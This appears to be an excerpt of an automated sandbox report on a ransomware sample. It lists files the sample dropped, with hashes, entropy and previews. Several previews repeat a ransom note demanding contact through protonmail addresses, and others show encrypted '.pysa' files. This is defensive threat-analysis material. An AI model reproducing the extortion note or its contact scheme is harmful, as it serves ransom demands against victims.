                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5736448
                  Entropy (8bit):7.999960385317492
                  Encrypted:true
                  SSDEEP:98304:HhJj3v8Qqf2quthZBHeWY4FqhFWhLZc7vJkPDG5cMNRMxUZRq9vUZ0UgXRn/S4O+:BJjqOqutjReWYmmQtW7vJXnNRSUa9JUE
                  MD5:0B3853BCEF45941AC941346C8166E1F8
                  SHA1:31DA83444AC1B0DCA55C4E091CE3DB860E8A43E4
                  SHA-256:CD4E9AC11DD78C0A8D3B6B98B1DD998340E3B77B073D15E25C3A2B24BB444F29
                  SHA-512:E4AA181A2EB8AC4EDD2E6B10F5EB701DAC0E0AFAB3A0CE1618EA9558F40AA8A9DC9E09370F45EA4A4E2780BFBF36235F30B278A50EE6B572ABC6CF14E9EFE81F
                  Malicious:true
                  Preview: ....".....s.......[v5..1{....Lk..........e_."...7.QvA.{{!b.]"...'{...)... #..k....6..............rc.`..H....~...c......?.F.......}....[...z.JOL.\.86..M..I.......+.T.(..I.g....^j..Z%...@.......L.].,.p.........i6J.^5.].?O0...vr...CM..\.#...\.m...1..w......C+.../,......3T..%..'.....L.....CE....Z...C&....8..~KY[....~K..2....{.y6q.H.)&).K.}.u..x5bJ4..L..=...XqF=fYa........7.......?...V."..<.-. .X.gd.+.?.'..A....`.W.............K.L...i.....@...D}......*r.;........9:zLF......Yu.[...5.B]....J?ym..?$..}....."..'.....YPR(r-M4...q......r....D.C..s..ala..bD...w......-..s.L....h!%`.%..."..x...i$..rf....5.K..%....m.k?.t.....Vc..$..E.B....VIf...T......t........S.T.....h.&.J.:B.D......e...f..XW.W-..qR..X..r3..... ...Bx...X.D!...k...O.M...0.".o.n..0......@..P.Q.. 91ogs.^....l^.n*..i...!.......pk......p........U..........l.9!..LS.[^sEZ.x...0@Z.'...u.p .2....HAdI.5..=....'.,...(N.....C....z7.*...z.. ....zd....H.=..k..f.hIS. 'u.....G.=|B.g..
                  C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994070542571197
                  Encrypted:true
                  SSDEEP:3072:E9wY7BzBnFklJ+wRnY5BTIACKVSDWVjqFRVCK:E9BVz9FvwRnOpVSDWV+FRN
                  MD5:983156B6AD6A3FEECEBFEF5511ADCD88
                  SHA1:C752F347C262F67F899AB4EBF77061C540870989
                  SHA-256:0DDB64F34F24C8FC8D57BF255B5F47F79731D36EAAAE1BCDED66A615493D69DD
                  SHA-512:9940F2FD5D78390F4A0171D10D16C829E44F7A6B574428731E1841316D9B75E7D7EB772196E4C53AF7F6E67D439037576423106CD77ECF2AAEBCC89BA4E7924F
                  Malicious:true
                  Preview: ...I9$jS..Yf<..o...-...]..X..+4M.......J._.6).....g.#.....E.........5..MU ..|;k.~..(...&..,....)Qk.....C4R.x'...j....E.C...-.....M!..x.....zi..].lQ..<.!Nr-.;(CY..*..#.M...^.....i-..cQ.|...........W.....6..{..79nod....|..qs...&.$%9..m...1.wEF3 .9.Y.....k>Q......a.._..6..\_.W..vGG.{4...P.s...0.w....n2...17.l.......h...*.cKh.......<CO....k.......Z..`Uu5.Z.t......K.t.q..-..-d1.M'..:..8cX!..jS.B.2.J.B....=.........E...fJ.......b.z...........i.pj...0.cP.K.8..<.......P_.V.Q....0...,.NA..8...<.._.......Wk........./:y..m...K......;...k.Z...?%..N{. gb....9!p.X..ne.zY..Hhew..E;..#..&.:..^.....3.>vT.?*q.[...p6E..8.S~.}...HfQ...{......,J.f...y.{".*....;..jp....JeB..nt......-P..q%o.@H.....m.J.....K....)*3e..t.+.6.G[..l....p..E..g......>[z.y...j.zu..x.......<C..".T-x...ZOpbp....].......M..d.MK...i....9.:.HMt.....N.j.Ek.....>......U.%.\...?.....)dTn...SN..'....!"-..@nZ..;9*..H.%.1..q...n~6.A.}@~MJ.|.t....+k.cm...&...........`...d..;..!..As.V.....
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\state.rsm.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.06135982677317
                  Encrypted:false
                  SSDEEP:48:4OAeUqhy8fHJgZG9W4Y2vzgsgpMA/NuO6MgGU165V+93:Oe7UUq2vzcpVV1UQfa
                  MD5:469ACBED91EF53CCD0C52A36C213CF85
                  SHA1:1E0A5D1547680DDDC902AF92E2AB83C37E03C681
                  SHA-256:F17E711BE4EF04EE57C026002813DEC831112B2AE25192ABC06F16DCB1FB4FF8
                  SHA-512:E7414571942569C2D35846286D7177C43BDFE083C59BBDF9B63D4E9B6608419FD37CD253668261A06E5C6DD7105FD24EDBBDE48FC9A2E232E8F9E7F4B00FBCF0
                  Malicious:false
                  Preview: R|.....A.S....<.6x.....a..Z...+...mW..}..K.WyOm.w.........>.~).....c?.....Dp.....-._d..6&EPR......q......3....lhv_..P..k.....Q...l.M..#/c.L+w.>....w.E...p.<.R....5.D..L..I..../.Dg.\^=......i.... ..W..%a.....>..[}-@.V..y....Nn~..]......|....p.......r&.J........z]A.\......p_..Y:./G..]..[2...~.]..G..58.[N....X.N....XM..Y.r.b......t4\/.&.f.......E.~..s.T3@(..1.n..u......<......"...D.d..g........9..L....i1.U.j.t5...c..[<...k..B>...?.G...En.{...6....+dNzNp@}.S..1A.............6i...d\_G..q.Z`+w7.g..H.-..`...12O..<...A.....}6.@.{..m....S.....n..i..K1....Y.+.;........<.R.y.[...Y.............{..,..>5.dM..&!............i.qx....).J{...b\..Pg..S..a....`.a.S.E8...[./.P.h.8fZ.C.C.....yqc.4..!.5....b......6.....O.bK.wm>|.@.~.jh.6..<..'....g...VN...r*...tH.h..A.4/NY.L.s...~H.M..0....vu...e.....D] ....M.q.....Nw.l....#...Lk.+......8!...Lv1.S@,...BkMC..m2...%..'8}.J..Brc2T..^&.8...2w....p..<...r..z........]+....Y_...WD...`...Kw.kI^t......;_,^ 1S....
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5531648
                  Entropy (8bit):7.999964479312233
                  Encrypted:true
                  SSDEEP:98304:GtsXOKcG+Ugqu0FUwt0RNhKJpUpfJUVwW55Htk2JccHJG2/ABP8AZAKa:oeJz4h0/uRNmCzUVRPHK2JRt4BPtZAKa
                  MD5:F646D591656104B2F89AD37B81DE29AE
                  SHA1:0FC7CFA3B23E8C554BAF858B1362BA37936359C0
                  SHA-256:01FF193ACF3C84E9AC549B1AE06CD30682DCA1F5FA389CE7AECDB4EB93DDE067
                  SHA-512:6B5CEE5531CB8CE90C6DE056C023A6D82773A47D6F4986E3496C6D7A24A97D0213268D9771AEA489DAB4882A10715C230938641EAB09A2E3F5830D232D32667D
                  Malicious:true
                  Preview: J...j.}j.H.G..U.X<E..9...c....|.j....2....ZL._...z..I./C..f..Tp.. ...hZ.D.7.<....E..R.0.M......?.......d....%......U...t.5.......R....."..F...WB.0g.......t.).L.e.....h.6.u....%..-...M.:.0=VpS......o...."...p....,.......{.6..|xG...%.]{..A.T..&g}.=nU4<..5..N.U...k"....y.....WE......<...a..r{.9...7....Z........eDG.^.........D. (.....t..7".rh...s..G2....q..6f......lk.g.\,...:...x>.nK..e.db.:.xCc.*...;z..E..o...~D;).........~..."*._5#.\....D"...T....N.....$c...8.mu.U!y.:..T.lUS$.%&..m..%.........o..<H.";i.B........3...DV-.."..j..ED.3.....z(...}.f..3.D..R._$.6..n`...gJ.$..T.S/kN)...Flyc.QXc.....R...KAD....;..d=..azY..9l..5GU.....:..*..O...Uk....5....|...P.u/&....4<@W....J.az...+....V-.J..1.U..u#.....[.T.2......Ke..`.Op..)..AH.&..k.4.m.f..FTHc...a.[...._&.G.R..y@%];r....j..k..Q.f5..w/$...t...............M......-.!o.X..g.[.5.!.Y.%.R..(..7T3.r#.F.M......CX.u...0.D-.E-..>.w.vV.1..+..9@..>......=..M1^.S>...7I...&.<..-)U.-..y\ .D>...n.y\..u.j'.
                  C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994130765911331
                  Encrypted:true
                  SSDEEP:3072:gWQNGw39hTeeTt6tvAf2BuApQZ56FQaqHd9F:Vq3XC1R8H56bqHfF
                  MD5:65D3E7FA3896796E1E1627EA63D1A6BA
                  SHA1:907B4E068B4B65861846AE8269460A8960CDCA3F
                  SHA-256:9A168E06890FEC9524CE3D10620BCA46BD0C3B2AC79F08566F540780805A57B3
                  SHA-512:073D59919C6359D0A8D344AA279603244A34642FBB6C43D26EF2FBA0823A426920B48068954ED772EB334512BB1188B1EABF01FA31ABF3BE1D9C02BC2B4FEB97
                  Malicious:true
                  Preview: 'wvV.t.\.........3...SA.D.H..d3...GwP..?.)Qy.Sw ..R.&..v.?..,..L....Q..ma..,..t,..VM..5.N.L..#......;XE..$.....a;..1_,...y<?.f.^-.f.4..g.'...9.xk.L...F..S.`h*.l...i..e....s....U.9..~.V*w0...".ik2... K..!.m.......4..Y...[...>ZN...gQ.D7...\a.a,.g..M.'.p.0u.X..M.2.K.nE*`...`u..'a..O...6......$.d....jj..Z.<./>!4.B..2.*..O[..Tc..?..vC..K=....L\Y.pxB.H.#4'..`.`g.......m.b.c..&.Re.es.t.R..;%.N.Z..MQ....~....F.D...f.QMo.Kw.>.sM.o....9/WM....-.6....=.....'..7..\b..0....5...N......w...S.A...5b.~......1.j.............K..o.$..@um..G.$....a.:....SHM%#.F.#W`.g.....>...dY5P|3........P:....b....V..hH.v5b.z5..=.....E..../'..NZ......s'..E...}6i.....Kdm"..+.............B.}C...py...t>..H.^...R7Q..O.a.1.N.....[7.+.q..zqzB.>..L..:..J...m..c.2.x..7.........c.R...D...~.X'AoA.AD...+....70. ...gt.....r.F.W.B.......N.l.......{..}...H..............G......Q.X.IA.ts....&...<.;n..5u...26[..!..&.b... ..AL.~y...3F_..... .gG5Y.Yg~.L..&2D.......E.....<...u....5....
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4797
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbw:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bw
                  MD5:B7D9B947F6097A86DF0A479AB95C70CA
                  SHA1:0DB05B9E103B4F8B53DB1CC004EA681462CB4420
                  SHA-256:6474EDE55A94CC4C2F3AABB1C5A0628553FFD23593ABAF6DB2C2C9DDC99D7CCA
                  SHA-512:EFE95531360059F9FB799AA0EA82B35EDA8C40D8AC252DA57B19700BBF3FCC6F5D1B3FD40C36E15120277216300F980CF9FC653AC06AEB7FE5FC17DF3E689A0B
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3731
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLF:e1bLg1bLg1bLg1bLg1bLg1bLg1bLF
                  MD5:5B9ED7078C8B9D5D8E79C442D1AF721A
                  SHA1:C346E1F25626A7E2F23E9B66AAC443EF463B43B1
                  SHA-256:924AD2EFD291DCFB30D1B6D8DB0907AFFF2456F24A986967AD49D125C95D5C8A
                  SHA-512:6DF4F238CC21D76516B0DE830B75964DC3BA81EB4BBC1C829C5BD06BBAA4E6FF9AD612CB7BD612F98A15451B3B495B40A58D4F872C137DA9BCBD76A4CF4BD874
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64\cab1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1026048
                  Entropy (8bit):7.999814604038516
                  Encrypted:true
                  SSDEEP:24576:P2AWEl77M0k0BTGsnyFlDyrU2qmbclHIXDdqJq0wZ949:ubk7w0BTGBQUXucmTE4e
                  MD5:BFD1381FB22DB2965ECC1D3DA8467F81
                  SHA1:C1679BF1BA820342DC14E050644A6295830B647D
                  SHA-256:D5051DD198CA0FA18AFB6A6127BF6C2DA4BAF4347329FEE72C925EFCCD037DC3
